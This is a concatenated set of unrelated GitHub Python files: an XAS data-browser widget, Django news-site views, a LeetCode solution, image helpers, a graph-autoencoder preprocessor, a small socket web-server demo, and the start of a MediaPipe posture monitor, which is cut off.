self._proj_button.clicked.connect(self._on_click_proj_button)\n\n\n def _on_click_proj_button(self):\n # self.model.events.open(selected_runs=self.model.selected_runs)\n run_list = self.model.selected_runs\n\n x_list, data_list, label_list = [], [], []\n for run in run_list:\n uid = run.metadata['start']['uid']\n energy, mu, name = self.db.read_spectrum(uid)\n ds = XASDataSet(name=(f'{name} [db_proc]'), md={}, energy=energy, mu=mu, filename='',\n datatype='experiment')\n self.parent.project.append(ds)\n # x_list.append(x)\n # data_list.append(data)\n # label_list.append(label)\n\n # self.parent.widget_mcr.add_references_to_specific_set(x_list, data_list, label_list)\n\n\n\n\nheadings = (\n \"Unique ID\",\n \"Transient Scan ID\",\n \"Plan Name\",\n \"Sample Name\",\n \"Sample Comment\",\n \"Scanning\",\n \"Start Time\",\n \"Duration\",\n \"Exit Status\",\n)\n\ndef extract_results_row_from_run(run):\n \"\"\"\n Given a BlueskyRun, format a row for the table of search results.\n \"\"\"\n from datetime import datetime\n\n metadata = run.describe()[\"metadata\"]\n start = metadata[\"start\"]\n stop = metadata[\"stop\"]\n start_time = datetime.fromtimestamp(start[\"time\"])\n if stop is None:\n str_duration = \"-\"\n else:\n duration = datetime.fromtimestamp(stop[\"time\"]) - start_time\n str_duration = str(duration)\n str_duration = str_duration[: str_duration.index(\".\")]\n return (\n start[\"uid\"][:8],\n start.get(\"scan_id\", \"-\"),\n start.get(\"plan_name\", \"-\"),\n start.get(\"name\", \"-\"),\n start.get(\"comment\", \"-\"),\n str(start.get(\"motors\", \"-\")),\n start_time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n str_duration,\n \"-\" if stop is None else stop[\"exit_status\"],\n )\n\ncolumns = (headings, extract_results_row_from_run)\n\n\nheadings_proc = (\n \"Unique ID\",\n \"Sample name\",\n \"Compound\",\n \"Element\",\n \"Edge\",\n \"E0\",\n \"Start Time\",\n)\n\ndef extract_results_row_from_run_proc(run):\n \"\"\"\n Given a BlueskyRun, format a row for the table of search results.\n \"\"\"\n from datetime import datetime\n\n metadata = run.describe()[\"metadata\"]\n start = metadata[\"start\"]\n # stop = metadata[\"stop\"]\n start_time = datetime.fromtimestamp(start[\"time\"])\n # if stop is None:\n # str_duration = \"-\"\n # else:\n # duration = datetime.fromtimestamp(stop[\"time\"]) - start_time\n # str_duration = str(duration)\n # str_duration = str_duration[: str_duration.index(\".\")]\n\n return (\n start[\"uid\"][:8],\n start.get(\"Sample_name\", \"-\"),\n start.get(\"compound\", \"-\"),\n start.get(\"Element\", \"-\"),\n start.get(\"Edge\", \"-\"),\n start.get(\"E0\", \"-\"),\n start_time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n )\n\ncolumns_proc = (headings_proc, extract_results_row_from_run_proc)\n\ncolumns_dict = {'columns' : columns,\n 'columns_proc' : columns_proc}\n\n# CATALOG_NAME = \"iss\"\n# CATALOG_NAME = \"iss-local\"\n# import databroker\n#\n# catalog = databroker.catalog[CATALOG_NAME]\n\n# search_model = SearchAndOpen(catalog, columns=columns)\n\ndef get_SearchAndOpen_widget(parent, catalog=None, columns='columns', add_open_button=True, add_mcr_button=False):\n search_model = SearchAndOpen(catalog, columns=columns_dict[columns])\n # search_model.events.open.connect(\n # lambda event: print(f\"Opening {event.selected_runs}\")\n # )\n search_view = QtSearchListWithButton(search_model, parent, add_open_button=add_open_button, add_to_proj_button=add_mcr_button)\n return search_view\n\n\n\n # self.push_refresh_folder.clicked.connect(self.get_file_list)\n # self.push_plot_data.clicked.connect(self.plot_xas_data)\n # self.comboBox_sort_files_by.addItems(['Time','Name'])\n # self.comboBox_sort_files_by.currentIndexChanged.connect((self.get_file_list))\n #\n # self.comboBox_data_numerator.currentIndexChanged.connect(self.update_current_numerator)\n # self.comboBox_data_denominator.currentIndexChanged.connect(self.update_current_denominator)\n #\n # self.list_data.itemSelectionChanged.connect(self.select_files_to_plot)\n # self.push_add_to_project.clicked.connect(self.add_data_to_project)\n # self.list_data.setContextMenuPolicy(Qt.CustomContextMenu)\n # self.list_data.customContextMenuRequested.connect(self.xas_data_context_menu)\n #\n # self.list_data.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n # self.addCanvas()\n # self.keys = []\n # self.last_keys = []\n # self.current_plot_in = ''\n # self.binned_data = []\n # self.last_numerator= ''\n # self.last_denominator = ''\n # # Persistent settings\n # self.settings = QSettings('ISS Beamline', 'Xview')\n # self.working_folder = self.settings.value('working_folder', defaultValue='/GPFS/xf08id/User Data', type=str)\n #\n # if self.working_folder != '/GPFS/xf08id/User Data':\n # self.label_working_folder.setText(self.working_folder)\n # self.label_working_folder.setToolTip(self.working_folder)\n # self.get_file_list()\n #\n # def xas_data_context_menu(self,QPos):\n # menu = QMenu()\n # plot_action = menu.addAction(\"&Plot\")\n # add_to_project_action = menu.addAction(\"&Add to project\")\n # parentPosition = self.list_data.mapToGlobal(QtCore.QPoint(0, 0))\n # menu.move(parentPosition+QPos)\n # action = menu.exec_()\n # if action == plot_action:\n # self.plot_xas_data()\n # elif action == add_to_project_action:\n # self.add_data_to_project()\n #\n # def addCanvas(self):\n # self.figure_data = Figure()\n # #self.figure_data.set_facecolor(color='#E2E2E2')\n # self.figure_data.ax = self.figure_data.add_subplot(111)\n # self.canvas = FigureCanvas(self.figure_data)\n # self.toolbar = NavigationToolbar(self.canvas, self)\n # self.toolbar.resize(1, 10)\n # self.layout_plot_data.addWidget(self.toolbar)\n # self.layout_plot_data.addWidget(self.canvas)\n # self.figure_data.tight_layout()\n # self.canvas.draw()\n #\n # def select_working_folder(self):\n # self.working_folder = QtWidgets.QFileDialog.getExistingDirectory(self, \"Select a folder\", self.working_folder,\n # QtWidgets.QFileDialog.ShowDirsOnly)\n # if self.working_folder:\n # self.settings.setValue('working_folder', self.working_folder)\n # if len(self.working_folder) > 50:\n # self.label_working_folder.setText(self.working_folder[1:20] + '...' + self.working_folder[-30:])\n # else:\n # self.label_working_folder.setText(self.working_folder)\n # self.get_file_list()\n #\n # def get_file_list(self):\n # if self.working_folder:\n # self.list_data.clear()\n #\n # files_bin = [f for f in os.listdir(self.working_folder) if f.endswith('.dat')]\n #\n # if self.comboBox_sort_files_by.currentText() == 'Name':\n # files_bin.sort()\n # elif self.comboBox_sort_files_by.currentText() == 'Time':\n # files_bin.sort(key=lambda x: os.path.getmtime('{}/{}'.format(self.working_folder, x)))\n #\n # files_bin.reverse()\n # self.list_data.addItems(files_bin)\n #\n # def select_files_to_plot(self):\n # df, header = load_binned_df_from_file(f'{self.working_folder}/{self.list_data.currentItem().text()}')\n # keys = df.keys()\n # refined_keys = []\n # for key in keys:\n # if not (('timestamp' in key) or ('energy' in key)):\n # refined_keys.append(key)\n # self.keys = refined_keys\n # if self.keys != self.last_keys:\n # self.last_keys = self.keys\n # self.comboBox_data_numerator.clear()\n # self.comboBox_data_denominator.clear()\n # self.comboBox_data_numerator.insertItems(0, self.keys)\n # self.comboBox_data_denominator.insertItems(0, self.keys)\n # if self.last_numerator!= '' and self.last_numerator in self.keys:\n # indx = self.comboBox_data_numerator.findText(self.last_numerator)\n # self.comboBox_data_numerator.setCurrentIndex(indx)\n # if self.last_denominator!= '' and self.last_denominator in self.keys:\n # indx = self.comboBox_data_denominator.findText(self.last_denominator)\n # self.comboBox_data_denominator.setCurrentIndex(indx)\n #\n # def update_current_numerator(self):\n # self.last_numerator= self.comboBox_data_numerator.currentText()\n # print(f'Chanhin last num to {self.last_numerator}')\n #\n # def update_current_denominator(self):\n # self.last_denominator= self.comboBox_data_denominator.currentText()\n # print(f'I am there {self.last_denominator}')\n #\n # def plot_xas_data(self):\n # selected_items = (self.list_data.selectedItems())\n # update_figure([self.figure_data.ax], self.toolbar, self.canvas)\n # if self.comboBox_data_numerator.currentText() == -1 or self.comboBox_data_denominator.currentText() == -1:\n # message_box('Warning','Please select numerator and denominator')\n # return\n #\n # self.last_numerator = self.comboBox_data_numerator.currentText()\n # self.last_denominator = self.comboBox_data_denominator.currentText()\n #\n # energy_key = 'energy'\n #\n # handles = []\n #\n # for i in selected_items:\n # path = f'{self.working_folder}/{i.text()}'\n # print(path)\n # df, header = load_binned_df_from_file(path)\n # numer = np.array(df[self.comboBox_data_numerator.currentText()])\n # denom = np.array(df[self.comboBox_data_denominator.currentText()])\n # if self.checkBox_ratio.checkState():\n # y_label = (f'{self.comboBox_data_numerator.currentText()} / '\n # f'{self.comboBox_data_denominator.currentText()}')\n # spectrum = numer/denom\n # else:\n # y_label = (f'{self.comboBox_data_numerator.currentText()}')\n # spectrum = numer\n # if self.checkBox_log_bin.checkState():\n # spectrum = np.log(spectrum)\n # y_label = f'ln ({y_label})'\n # if self.checkBox_inv_bin.checkState():\n # spectrum = -spectrum\n # y_label = f'- {y_label}'\n #\n # self.figure_data.ax.plot(df[energy_key], spectrum)\n # self.parent.set_figure(self.figure_data.ax,self.canvas,label_x='Energy (eV)', label_y=y_label)\n #\n # self.figure_data.ax.set_xlabel('Energy (eV)')\n # self.figure_data.ax.set_ylabel(y_label)\n # last_trace = self.figure_data.ax.get_lines()[len(self.figure_data.ax.get_lines()) - 1]\n # patch = mpatches.Patch(color=last_trace.get_color(), label=i.text())\n # handles.append(patch)\n #\n # self.figure_data.ax.legend(handles=handles)\n # self.figure_data.tight_layout()\n # self.canvas.draw_idle()\n #\n #\n # def add_data_to_project(self):\n # if self.comboBox_data_numerator.currentText() != -1 and self.comboBox_data_denominator.currentText() != -1:\n # for item in self.list_data.selectedItems():\n # filepath = str(Path(self.working_folder) / Path(item.text()))\n #\n # name = Path(filepath).resolve().stem\n # df, header = load_binned_df_from_file(filepath)\n # uid = header[header.find('UID:')+5:header.find('\\n', header.find('UID:'))]\n #\n #\n # try:\n # md = self.db[uid]['start']\n # except:\n # print('Metadata not found')\n # md={}\n #\n # df = df.sort_values('energy')\n # num_key = self.comboBox_data_numerator.currentText()\n # den_key = self.comboBox_data_denominator.currentText()\n # mu = df[num_key] / df[den_key]\n #\n # if self.checkBox_log_bin.checkState():\n # mu = np.log(mu)\n # if self.checkBox_inv_bin.checkState():\n # mu = -mu\n # mu=np.array(mu)\n #\n # ds = XASDataSet(name=name,md=md,energy=df['energy'],mu=mu, filename=filepath,datatype='experiment')\n # ds.header = header\n # self.parent.project.append(ds)\n # self.parent.statusBar().showMessage('Scans added to the project successfully')\n # else:\n # message_box('Error', 'Select numerator and denominator columns')\n #\n #\n #\n #\n","repo_name":"NSLS-II-ISS/xview","sub_path":"xview/widgets/widget_xview_databroker.py","file_name":"widget_xview_databroker.py","file_ext":"py","file_size_in_byte":22591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30005981972","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views import generic\nfrom django.urls import reverse_lazy\nfrom .models import NewsStory\nfrom .forms import StoryForm\nfrom django.db.models import Q\n# from django.views.generic.edit import DeleteView\n# from http import \n\nclass IndexView(generic.ListView):\n template_name = 'news/index.html'\n context_object_name = \"all_stories\"\n\n def get_queryset(self):\n '''Return all news stories.'''\n return NewsStory.objects.all().order_by('pub_date')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n # print(context)\n # print(NewsStory.objects.all())\n context['latest_stories'] = NewsStory.objects.all().order_by('-pub_date')[:4]\n context['category_choices'] = NewsStory.CATEGORY_CHOICES\n # context['story_categories'] = NewsStory.objects.filter(category__icontains=\"Science\")\n # context['categories'] = NewsStory.objects.filter(category=\"Science\")\n return context\n \nclass CategoryView(generic.ListView):\n model = NewsStory\n template_name = 'news/science.html' \n context_object_name = 'story_categories'\n\n def get_queryset(self, category):\n return NewsStory.objects.filter(category=category)\n\nclass StoryView(generic.DetailView):\n model = NewsStory\n template_name = 'news/story.html'\n context_object_name = 'story'\n \n \n\n \n def get(self, request, *args, **kwargs):\n self.object = self.get_object()\n context = self.get_context_data(object=self.object)\n print(context)\n fav = bool\n\n if context['story'].favourited_by.filter(id=request.user.id).exists():\n context['favourites'] = True\n\n return self.render_to_response(context)\n\n \n\nclass AddStoryView(generic.CreateView):\n form_class = StoryForm\n context_object_name = 'storyform'\n template_name = 'news/createStory.html'\n success_url = reverse_lazy('news:index')\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n \nclass EditStoryView(generic.UpdateView):\n model = NewsStory\n form_class = StoryForm\n context_object_name = 'storyform'\n template_name = 'news/editStory.html'\n success_url = reverse_lazy('news:index')\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form) \n \nclass DeleteStoryView(generic.DeleteView):\n model = NewsStory \n # form_class = StoryForm\n context_object_name = 'storyform'\n template_name = 'news/deleteStory.html'\n success_url = reverse_lazy('news:index')\n\nclass SearchView(generic.TemplateView):\n template_name = 'news/search.html'\n\nclass SearchResultsView(generic.ListView):\n model = NewsStory\n template_name = 'news/searchResults.html'\n context_object_name = 'search_stories' \n success_url = reverse_lazy('news:index') \n\n def get_queryset(self):\n '''Return news stories filtered by author first or last name or category'''\n query_author = self.request.GET.get(\"author\") \n query_category = self.request.GET.get(\"category\")\n print(query_author, query_category)\n if query_author is None or query_author == \"\":\n result_set = NewsStory.objects.filter(Q(category__icontains=query_category))\n\n elif query_category is None or query_category == \"\": \n result_set = NewsStory.objects.filter(Q(author__last_name__icontains=query_author) | Q(author__first_name__icontains=query_author))\n else: \n result_set = NewsStory.objects.filter((Q(author__last_name__icontains=query_author) | Q(author__first_name__icontains=query_author)) \n & Q(category__icontains=query_category))\n \n # return NewsStory.objects.filter(Q(author__last_name__icontains=query_author) | Q(author__first_name__icontains=query_author) \n # | Q(category__icontains=query_category))\n return result_set","repo_name":"trace-n/she_codes_news","sub_path":"she_codes_news/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"19736304412","text":"\"\"\"\nGiven a string, find the first non-repeating character in it and return its index. If it doesn't exist, return -1.\n\"\"\"\nclass Solution(object):\n def firstUniqChar(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n # 方法一:哈希计数\n # 使用哈希表记录所有字母出现的次数,然后选择第一个次数为 1 的字符。\n # hashset_s = {}\n # for i in range(len(s)):\n # if s[i] in hashset_s:\n # hashset_s[s[i]] += 1\n # else:\n # hashset_s[s[i]] = 1\n # first_idx = len(s)\n # for key, val in hashset_s.items():\n # if val == 1:\n # idx = s.index(key)\n # if idx < first_idx:\n # first_idx = idx\n # if first_idx == len(s):\n # return -1\n # else:\n # return first_idx\n \n # 方法二:双指针搜索\n # 设定两个指针 i,j,i 依次向后搜索,每次 j 从 i+1 处向后搜索,查看是否有重复元素。\n # 若没有则返回 i,否则直到 i 到达末尾。\n reptchar = []\n n = len(s)\n for i in range(n):\n if s[i] in reptchar:\n continue\n for j in range(i+1, n):\n if s[j] == s[i]:\n reptchar.append(s[i])\n break\n if j == n-1 and s[j] != s[i]:\n return i\n if i == n-1:\n if s[i] in reptchar:\n return -1\n else:\n return n-1\n return -1\n\nS = Solution()\n# s = \"leetcode\"\n# print(S.firstUniqChar(s))\n# s = \"loveleetcode\"\n# print(S.firstUniqChar(s))\n# s = \"aab\"\n# print(S.firstUniqChar(s))\ns = \"aa\"\nprint(S.firstUniqChar(s))","repo_name":"sinat-jiang/leetcode","sub_path":"387-FirstUniqueCharacterInAString.py","file_name":"387-FirstUniqueCharacterInAString.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34223436520","text":"def getValue(pixel):\r\n return int(0.299 * pixel[0] + 0.587 * pixel[1] + 0.114 * pixel[2])\r\n\r\ndef getBits(n):\r\n n = bin(n).replace('0b','')\r\n temp = ''\r\n for i in range(len(n),8):\r\n temp += '0'\r\n temp += n\r\n return temp\r\n\r\ndef toDecimal(bits,k):\r\n result = 0\r\n for i in range(k):\r\n result += int(bits[i]) * (2 ** (7-i))\r\n \r\n return int(result)\r\n\r\ndef replicate(image, n=3):\r\n img = np.copy(image)\r\n height = img.shape[0]\r\n \r\n newImg = []\r\n \r\n n = int(n/2)\r\n \r\n col1 = img[:,0].reshape(height,1,3)\r\n col2 = img[:,-1].reshape(height,1,3)\r\n \r\n for i,row in enumerate(img):\r\n newImg.append([])\r\n \r\n for _ in range(n+1):\r\n newImg[i].append(col1[0][0])\r\n \r\n for pixel in row:\r\n newImg[i].append(pixel)\r\n \r\n for _ in range(n+1):\r\n newImg[i].append(col2[0][0])\r\n \r\n for _ in range(n+1):\r\n newImg.insert(0,newImg[0])\r\n newImg.insert(-1,newImg[-1])\r\n \r\n return np.array(newImg,dtype='uint8')\r\n\r\n\r\ndef convlution_sum(window,matrix):\r\n n = len(matrix)\r\n \r\n result = 0\r\n for i in range(0,n):\r\n for j in range(0,n):\r\n result += matrix[i][j] * window[i][j]\r\n \r\n return result\r\n\r\ndef getNeighbours(img, row, col, n):\r\n matrix = np.zeros((n,n,3))\r\n \r\n k = int((n-1)/2)\r\n \r\n r1 = row-k\r\n r2 = row+k+1\r\n \r\n c1 = col-k\r\n c2 = col+k+1\r\n\r\n matrix[:] = img[r1:r2,c1:c2]\r\n \r\n return matrix\r\n","repo_name":"mustashrf/DIP-Basic-Functions-with-Python","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26963349872","text":"# 类属性和对象属性重名时,只能通过 类名.属性名 方式进行调用\n# 定义类\nclass Dog(object):\n # 定义类属性\n type = '狗类'\n\n # 定义对象(实例)属性\n def __init__(self):\n self.type = '二哈'\n\n\n# 创建对象\nerha = Dog()\n# 获取类属性\nprint(Dog.type)\n# 获取对象属性\nprint(erha.type)\n","repo_name":"LYY1998CO/Python_Advanced_Review","sub_path":"Day03/03-类属性和对象属性重名.py","file_name":"03-类属性和对象属性重名.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41781042807","text":"\"\"\"\nPreprocessing function to tokenize functions and encode ASTs in accordance with the specified GAE\n\"\"\"\n\nimport ast\nimport copy\nimport pickle\n\nimport torch\nfrom anytree import Node\nfrom datasets import load_dataset\nfrom torch_geometric.utils import train_test_split_edges\nfrom tqdm import tqdm\nfrom transformers import GPT2TokenizerFast\n\nfrom Graph_generator import ast_visit, graph_to_dict, make_graph_tensors\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\ntokenizer = GPT2TokenizerFast.from_pretrained(\"microsoft/CodeGPT-small-py\", add_prefix_space=True)\n\ndataset = load_dataset(\"code_search_net\", \"python\")\n\ninput_tokens = []\ntarget_tokens = []\nembedded_graphs = []\n\n# Loading trained model\nmodel = torch.load('GAE_models/GAE')\nmodel.eval()\nmodel.to(device)\n\nsplit_type = \"validation\"\ndataset_size = 5000 # Number of functions to process\n\nfor i, function in tqdm(enumerate(dataset[split_type])):\n\n if i > dataset_size:\n break\n\n # Extracting strings and tokens from dataset\n function_string = function['func_code_string']\n function_tokens = function['func_code_tokens']\n\n pre_tokens = tokenizer(function_tokens, is_split_into_words=True)\n\n # Discarding tokens over 784 in length (not needed for current LSTM downstream application)\n if len(pre_tokens.data['input_ids']) < 784:\n\n split_ratio = 0.9 # This is not needed for the current configuration, yet is splitting the function at 90%\n tokens = pre_tokens.data['input_ids']\n split_id = int(len(tokens) * split_ratio)\n\n target_token = tokens[split_id]\n input_token = tokens[:split_id]\n\n # AST Generation\n ast_dicts = []\n try:\n # Generating and walking AST graph\n ast_graph = ast_visit(ast.parse(function_string), parent_node=Node(\"Root\"))\n ast_dict = graph_to_dict(ast_graph)\n ast_dicts.append(ast_dict)\n ast_graph_tensor = make_graph_tensors(ast_dicts)[0]\n graph_2 = copy.deepcopy(ast_graph_tensor)\n\n # Preparing data\n x = graph_2.x.to(device)\n data = train_test_split_edges(graph_2, test_ratio=1, val_ratio=0)\n\n # Forward pass\n z = model.encode(x, data.test_pos_edge_index.to(device))\n\n # Appending only on successful AST generation\n input_tokens.append(input_token)\n target_tokens.append(target_token)\n embedded_graphs.append(z)\n\n except SyntaxError or TypeError:\n # Occasionally the functions cannot be compiled and will throw syntax or type errors\n pass\n\n# Collating and saving data for downstream training of the predictor model\ndata = (input_tokens, target_tokens, embedded_graphs)\nwith open('{}_data(input_target_z).pkl'.format(split_type), 'wb') as handle:\n pickle.dump(data, handle)","repo_name":"notsamdonald/Code-Prediction","sub_path":"Predictor_preprocessor.py","file_name":"Predictor_preprocessor.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9007099453","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# author:joel 19-11-11\n\n\"\"\"\nsocket实现的Web服务\n问题:Python socket编程通信、套接字\n\"\"\"\n\nimport socket\n\nEOL1 = b'\\n\\n'\nEOL2 = b'\\n\\r\\n'\nbody = '''Hello, world!

from the5fire 《Django企业开发实战》

'''\nresponse_params = [\n 'HTTP/1.0 200 OK',\n 'Date: Sun, 27 may 2019 01:01:01 GMT',\n 'Content-Type: text/html;charset=utf-8',\n 'Content-Length: {}\\r\\n'.format(len(body.encode())),\n body,\n]\nresponse = '\\r\\n'.join(response_params)\n\n\ndef handle_connection(conn, addr):\n print('oh, new conn', conn, addr)\n import time\n time.sleep(20)\n request = b\"\"\n while EOL1 not in request and EOL2 not in request:\n request += conn.recv(1024)\n print(request)\n # response转为bytes后传输\n conn.send(response.encode())\n conn.close()\n\n\ndef main():\n # socket.AF_INET 用于服务器与服务器之间的网络通信\n # socket.SOCK_STREAM 用于基于TCP的流式socket通信\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # 设置端口可复用,保证每次按Ctrl+C后,快速重启\n serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n serversocket.bind(('127.0.0.1', 8000))\n # 设置backlog--socket 连接最大排队数量\n serversocket.listen(5)\n print('http://127.0.0.1:8000')\n\n try:\n while True:\n conn, address = serversocket.accept()\n handle_connection(conn, address)\n finally:\n serversocket.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"joelYing/SpiderBar","sub_path":"JangGou/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"} +{"seq_id":"39574266336","text":"import sys\nimport pandas as pd\nimport time\nimport pygame\nimport datetime as dt\nimport math\nimport csv\nimport numpy as np\nimport mediapipe as mp\nimport cv2\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, \\\n QLabel, QLineEdit, QMessageBox, QVBoxLayout, QFileDialog, QGraphicsScene, QGraphicsView\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtGui import QImage, QPixmap, QPen\nfrom PyQt5.QtCore import QTimer\nfrom ctypes import *\nimport matplotlib.pyplot as plt\n\nWIDTH = windll.user32.GetSystemMetrics(0)\nHEIGHT = windll.user32.GetSystemMetrics(1)\n\nFLAG = False\n\npygame.init()\n\ncount = 0\n\nwith open(\"data.csv\", \"r\") as file:\n reader = csv.reader(file)\n lines = list(reader)\n day, today, my_time, exercise_count = lines[-1]\n\nFLAG_DATE = False\nif today != str(dt.date.today()):\n day = int(day)\n day += 1\n FLAG_DATE = True\n my_time = int(my_time)\n my_time = 0\n exercise_count = int(exercise_count)\n exercise_count = 0\n today = dt.date(2003, 2, 24)\n today = dt.date.today()\n\n\ndef skeleton_recognition():\n global global_cap\n global FLAG\n global count\n mp_drawing = mp.solutions.drawing_utils\n mp_pose = mp.solutions.pose\n\n delt_code_1_1 = 0.05\n delt_code_1_2 = 0.02\n delt_angle_max = 105\n delt_angle_min = 75\n delt_code_3_1 = 0.04\n\n\n\n time_11 = 0\n time_12 = 0\n time_31 = 0\n time_32 = 0\n time_4 = 0\n\n waiting_time = 100\n\n min_spine_length = 0.0\n\n code_11 = '11'\n code_12 = '12'\n code_31 = '31'\n code_32 = '32'\n code_4 = '4'\n code_0 = '0'\n code_1 = '1'\n\n def calculate_angle(a, b, c):\n a = np.array(a) # первая точка\n b = np.array(b) # вторая точка\n c = np.array(c) # третья точка\n\n radians = np.arctan2(c[1] - b[1], c[0] - b[0]) - np.arctan2(a[1] - b[1], a[0] - b[0])\n angle = np.abs(radians * 180.0 / np.pi)\n\n if angle > 180.0:\n angle = 360 - angle\n\n return angle\n\n cap = global_cap\n\n\n with mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose: # установка порогов доверия\n while FLAG:\n if count == 0:\n flag_spine = False\n count += 1\n ret, frame = cap.read()\n\n # изменение цвета на RGB формат\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False # без записи\n\n # обнаружение\n results = pose.process(image)\n\n # обратно меняем цвет\n image.flags.writeable = True # записываем\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n try:\n landmarks = results.pose_landmarks.landmark # выводим только фактические точки (если они за пределами, не выводим)\n # ------------------координаты ориентиров\n left_shoulder = [landmarks[mp_pose.PoseLandmark.LEFT_SHOULDER].x,\n landmarks[mp_pose.PoseLandmark.LEFT_SHOULDER].y]\n right_shoulder = [landmarks[mp_pose.PoseLandmark.RIGHT_SHOULDER].x,\n landmarks[mp_pose.PoseLandmark.RIGHT_SHOULDER].y]\n\n left_hip = [landmarks[mp_pose.PoseLandmark.LEFT_HIP].x, landmarks[mp_pose.PoseLandmark.LEFT_HIP].y]\n right_hip = [landmarks[mp_pose.PoseLandmark.RIGHT_HIP].x, landmarks[mp_pose.PoseLandmark.RIGHT_HIP].y]\n\n left_ear = [landmarks[mp_pose.PoseLandmark.LEFT_EAR].x, landmarks[mp_pose.PoseLandmark.LEFT_EAR].y]\n right_ear = [landmarks[mp_pose.PoseLandmark.RIGHT_EAR].x, landmarks[mp_pose.PoseLandmark.RIGHT_EAR].y]\n nose = [landmarks[mp_pose.PoseLandmark.NOSE].x, landmarks[mp_pose.PoseLandmark.NOSE].y]\n\n\n left_knee = [landmarks[mp_pose.PoseLandmark.LEFT_KNEE].x, landmarks[mp_pose.PoseLandmark.LEFT_KNEE].y]\n right_knee = [landmarks[mp_pose.PoseLandmark.RIGHT_KNEE].x,\n landmarks[mp_pose.PoseLandmark.RIGHT_KNEE].y]\n\n left_ankle = [landmarks[mp_pose.PoseLandmark.LEFT_ANKLE].x,\n landmarks[mp_pose.PoseLandmark.LEFT_ANKLE].y]\n right_ankle = [landmarks[mp_pose.PoseLandmark.RIGHT_ANKLE].x,\n landmarks[mp_pose.PoseLandmark.RIGHT_ANKLE].y]\n\n # ------------------отрисовка средней линии позвоночника\n # отрисовка средней точки плечевого пояса\n avg_point_shoulder = (\n (left_shoulder[0] + right_shoulder[0]) / 2, (left_shoulder[1] + right_shoulder[1]) / 2)\n cv2.circle(image,\n (int(avg_point_shoulder[0] * frame.shape[1]), int(avg_point_shoulder[1] * frame.shape[0])),\n 5,\n (0, 0, 255), -1)\n # отрисовка средней точки тазового пояса\n avg_point_hip = ((left_hip[0] + right_hip[0]) / 2, (left_hip[1] + right_hip[1]) / 2)\n cv2.circle(image,\n (int(avg_point_hip[0] * frame.shape[1]), int(avg_point_hip[1] * frame.shape[0])), 5,\n (0, 0, 255),\n -1)\n\n cv2.line(image,\n (int(avg_point_shoulder[0] * frame.shape[1]), int(avg_point_shoulder[1] * frame.shape[0])),\n (int(avg_point_hip[0] * frame.shape[1]), int(avg_point_hip[1] * frame.shape[0])), (255, 0, 0),\n 2)\n\n # ---------------------------------------------------------------------------------3 контроль спины\n # определение длины позвоночника при сутулости\n\n while flag_spine != True:\n local_flag = True\n if local_flag:\n print(code_0)\n pygame.mixer.music.load(\"Voices/code_0.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(4000)\n pygame.mixer.music.stop()\n time.sleep(5)\n local_flag = False\n min_spine_length = math.sqrt(\n (avg_point_shoulder[0] - avg_point_hip[0]) ** 2 + (\n avg_point_shoulder[1] - avg_point_hip[1]) ** 2)\n print(code_1)\n pygame.mixer.music.load(\"Voices/code_1.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(2000)\n pygame.mixer.music.stop()\n flag_spine = True\n\n if abs(math.sqrt((avg_point_shoulder[0] - avg_point_hip[0]) ** 2 + (\n avg_point_shoulder[1] - avg_point_hip[1]) ** 2) - min_spine_length) < delt_code_3_1:\n time_31 += 1\n if time_31 > waiting_time:\n print(code_31)\n pygame.mixer.music.load(\"Voices/code_31.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(4000)\n pygame.mixer.music.stop()\n time_31 = 0\n else:\n time_31 = 0\n count += 1\n\n # считаем угол между туловищем и ногами\n angle_l_spine = calculate_angle(left_shoulder, left_hip, left_knee)\n angle_r_spine = calculate_angle(right_shoulder, right_hip, right_knee)\n\n if angle_l_spine > delt_angle_max or angle_l_spine < delt_angle_min or angle_r_spine > delt_angle_max or angle_r_spine < delt_angle_min:\n time_32 += 1\n if time_32 > waiting_time:\n print(code_32)\n pygame.mixer.music.load(\"Voices/code_32.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(5000)\n pygame.mixer.music.stop()\n time_32 = 0\n else:\n time_32 = 0\n count += 1\n\n # ---------------------------------------------------------------------------------1 контроль головы\n # приблизительно одна прямая уха и средней точки плечевого пояса\n\n if abs(avg_point_shoulder[0] - right_ear[0]) > delt_code_1_1 or abs(\n avg_point_shoulder[0] - left_ear[0]) > 